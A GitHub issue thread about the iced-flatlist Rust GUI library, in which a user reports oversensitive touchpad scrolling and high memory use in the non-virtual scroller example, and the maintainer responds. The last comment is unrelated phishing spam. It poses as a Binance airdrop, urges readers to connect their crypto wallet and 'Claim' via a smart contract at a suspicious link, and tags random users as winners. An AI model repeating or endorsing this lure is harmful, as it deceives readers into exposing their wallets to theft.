### ISSUE TITLE
Examples not working best with touchpad

### ISSUE THREAD

**Issue by bq-wrongway** [luizvidoto/iced-flatlist#2]
I want to just say that from 4 examples, only the virual scroller worked nicely with touchpad, scrolling was smooth and consistent.

Scrolling others would result in huge leaps in list, i barely moved my finger on touchapd and i would jump from first 20 items on the list, to 600+ and again small movement and i am at 2000 + etc. 
It feels way to sensitive, while on virtual scroller example works like a charm.

I can provide videos if needed

**Comment by luizvidoto** [comment]
Hey, thanks for trying this lib. It's still under development. I'll check it out this issue later today and give you a feedback.

**Comment by luizvidoto** [comment]
I fixed some issues in the virtual scroller example. See if it's working now.

**Comment by bq-wrongway** [comment]
Hey, 
i cloned the repo today and tryed again. 
Well virtual scroller works perfect, but normal one does not, what happens now, i get it to run, window shows up and i see items, but its frozen, and i always get "stopped responding" notification. 
Until i kill the process, also virtual scroller takes 30 MB of ram, normal scroller takes anywhere between 1.6GB up to 1.9GB.
Its loading all items in memory, or something else is the issue im not sure.

**Comment by luizvidoto** [comment]
That's right. The normal scroller is only there to compare with the virtual scroller. If someday they fix this issue, better to use a virtual scroller instead.

**Comment by ibdcdev** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

Winners: @zhujunsan, @vamc106, @hiwjd, @zchcai, @mehdi-elmehdi, @plamen1982, @blockchainshadow, @the-cc-dev, @SuperVeggy, @pengchenwanli
